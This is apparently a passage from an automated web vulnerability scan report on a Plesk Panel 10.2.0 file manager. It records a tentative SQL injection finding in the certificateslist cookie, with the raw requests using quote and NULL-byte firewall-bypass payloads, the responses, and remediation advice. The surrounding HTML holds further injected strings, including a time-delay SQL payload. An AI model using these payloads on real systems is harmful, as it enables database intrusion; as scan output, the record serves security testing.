title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/edit/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/ [certificateslist cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/view/

Issue detail

The certificateslist cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the certificateslist cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%00'; no_frames_login_page=deleted;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:32 GMT
Connection: close
Content-Length: 956

ERROR: PleskBadURIException
Invalid URI:

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI:

0: UIPointer.php:40
   UIPointer::parse(string '')
1: UiIntegration.php:213
   UiIntegration->_getRootUIPointers()
2: UiIntegration.php:300
   UiIntegration->isUriValid(object of type plesk__client__dashboard)
3: SMBConnector.php:110
   SMBConnector->renderPathbar(object of type Navigation, object of type plesk__client__domain__hosting__file_manager__view)
4: Abstract.php:288
   Form_Abstract->renderPathbarHistory(object of type Navigation, object of type plesk__client__domain__hosting__file_manager__view)
5: Form.php:144
   Form->assign()
6: class.FileManagerForm.php:694
   FileManagerForm->assignFileList(object of type FileList, boolean false)
7: FileManagerUIPointer.php:747
   FileManagerUIPointer->accessItem(string 'GET', NULL null)
8: UIPointer.php:600
   UIPointer->access(string 'GET')
9: plesk.php:47

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%00''; no_frames_login_page=deleted;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:36 GMT
Connection: close
Content-Length: 93446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%27%29waitfor%2520delay%270%253a0%253a20%27--%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

